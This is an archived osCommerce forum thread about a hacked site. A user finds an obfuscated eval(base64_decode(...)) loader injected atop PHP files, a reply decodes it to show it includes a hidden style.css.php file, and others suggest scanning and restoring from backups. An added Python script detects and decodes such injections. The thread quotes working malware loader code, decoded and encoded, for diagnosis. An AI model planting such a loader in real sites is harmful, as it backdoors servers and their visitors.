xprt007 Posted March 25, 2010

Hi

I noticed some strange code I don't remember seeing before at the top of some files I opened, including application_top.php & column_right.php. Here is a sample:

    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2FmcmlxdWUxL3B1YmxpY19odG1sL2RydXBhbC9zaXRlcy9kZWZhdWx0L21vZHVsZXMvaW1hZ2UvY29udHJpYi9pbWFnZV9nYWxsZXJ5L3ZpZXdzL3RoZW1lL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

Is it normal & if not, would it mean the site was hacked?

Thanks in advance & regards.

knifeman Posted March 25, 2010

answer secure my site

Guest Posted March 25, 2010

> I noticed some strange code I don't remember seeing before at the top of some files I opened, including application_top.php & column_right.php.
> Is it normal & if not, would it mean the site was hacked?

You have been hacked. Here is the code:

    if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) {
        $GLOBALS['mfsn'] = '/home/afrique1/public_html/drupal/sites/default/modules/image/contrib/image_gallery/views/theme/style.css.php';
        if (file_exists($GLOBALS['mfsn'])) {
            include_once($GLOBALS['mfsn']);
            if (function_exists('gml') && function_exists('dgobh')) {
                ob_start('dgobh');
            }
        }
    }

xprt007 Posted March 30, 2010 (Author)

Thanks for your very informative responses.

That is no good news as it means practically spending lots of hours of extra work on a site that was going to be handed over to a client.

Is this just bad luck to have been hacked at this time or Oscommerce is that vulnerable? If this particular vulnerability is known, why are there no better defenses or the suggested measures above not applied to the code? Anyway, I don't know Oscommerce enough to criticize it. I'm more at home with Drupal CMS & there such issues are handled differently.

Since all php files, including those outside Oscommerce in other folders have been infected, I think I will begin by deleting everything. I have Drupal CMS in another folder which has also been infected. >_< :blink: :'(

If I have more questions ...

Once again, thanks & regards :thumbsup:

Guest Posted March 30, 2010

> Since all php files, including those outside Oscommerce in other folders have been infected, I think I will begin by deleting everything. I have Drupal CMS in another folder which has also been infected.
> If I have more questions ...
> Once again, thanks & regards

You can also try this contribution: osCommerce VTS

It's a Virus & Threat Scanner for osCommerce that can help you find infected files if you want to..

xprt007 Posted March 30, 2010 (Author)

> You can also try this contribution: osCommerce VTS
> It's a Virus & Threat Scanner for osCommerce that can help you find infected files if you want to..

Hi

I am on shared server. As I see in the readme file, the script works there as well.

Apart from scanning, what does it do? Can it delete the located bad files?

In my case, it seems all the thousands of Oscommerce & those in other folders with complete scripts/sites, such as the mentioned Drupal site have apparently already been infected & have to be cleaned or deleted & replaced.

How would this help me at this stage? I'm sure it is worth having AFTER the clean up.

Thanks & regards

Guest Posted March 31, 2010

> Hi
> I am on shared server. As I see in the readme file, the script works there as well.
> Apart from scanning, what does it do? Can it delete the located bad files?
> In my case, it seems all the thousands of Oscommerce & those in other folders with complete scripts/sites, such as the mentioned Drupal site have apparently already been infected & have to be cleaned or deleted & replaced.
> How would this help me at this stage? I'm sure it is worth having AFTER the clean up.
> Thanks & regards

It does nothing more than scan and report possible threats in your files. You have to manually erase files or code from files.

If hundreds or thousands of files are infected, then erase your whole site and reinstall from earlier backups. If you don't have up to date backups it could be worth trying this contribution..
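
Added example, not part of any post in this thread and not code from osCommerce VTS: a static scan-and-report pass for the injected block quoted above. It decodes the base64 payload without executing it and lists the .php paths the payload names; the function names and the sample path are assumptions, and the sample input is constructed.

```python
import base64
import binascii
import re
from pathlib import Path

# Shape seen in this thread: <?php /**/eval(base64_decode('...')); ?>
INJECTION = re.compile(
    rb"<\?php\s*(?:/\*.*?\*/)?\s*eval\(\s*base64_decode\(\s*"
    rb"['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*;?\s*\?>",
    re.DOTALL,
)
# Absolute .php paths named inside a decoded payload (the file it loads).
PHP_PATH = re.compile(rb"""['"](/[^'"]+\.php)['"]""")


def find_injections(data: bytes) -> list[dict]:
    """One finding per injected block; payloads are decoded, never executed."""
    findings = []
    for m in INJECTION.finditer(data):
        try:
            payload = base64.b64decode(m.group(1))
        except (binascii.Error, ValueError):
            payload = b""  # malformed blob: still report the hit
        findings.append({
            "offset": m.start(),
            "payload": payload.decode("utf-8", "replace"),
            "includes": [p.decode("utf-8", "replace") for p in PHP_PATH.findall(payload)],
        })
    return findings


def scan_tree(root: str) -> dict[str, list[dict]]:
    """Walk root and report every *.php file carrying the injected block."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = find_injections(path.read_bytes())
        if hits:
            report[str(path)] = hits
    return report


def constructed_sample() -> bytes:
    # Constructed sample: inert payload shaped like the code in this thread.
    inner = b"$GLOBALS['mfsn']='/home/example/public_html/style.css.php';ob_start('dgobh');"
    blob = base64.b64encode(inner)
    return b"<?php /**/eval(base64_decode('" + blob + b"')); ?><?php\n// shop code\n"


if __name__ == "__main__":
    for hit in find_injections(constructed_sample()):
        print(hit["offset"], hit["includes"], hit["payload"])
```

Every path listed under "includes" is a file to check as well, since the block in each infected file only loads it.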

xprt007 Posted March 31, 2010 (Author)

I have another question: Is the database also infected by this code? :rolleyes:

In that case, I would just delete the files, upload new oscommerce files ...

Guest Posted March 31, 2010

> I have another question: Is the database also infected by this code?
> In that case, I would just delete the files, upload new oscommerce files ...

Normally it is not. The code you showed us does not alter the database. You should do a scan and see if there is more..

Archived
This topic is now archived and is closed to further replies.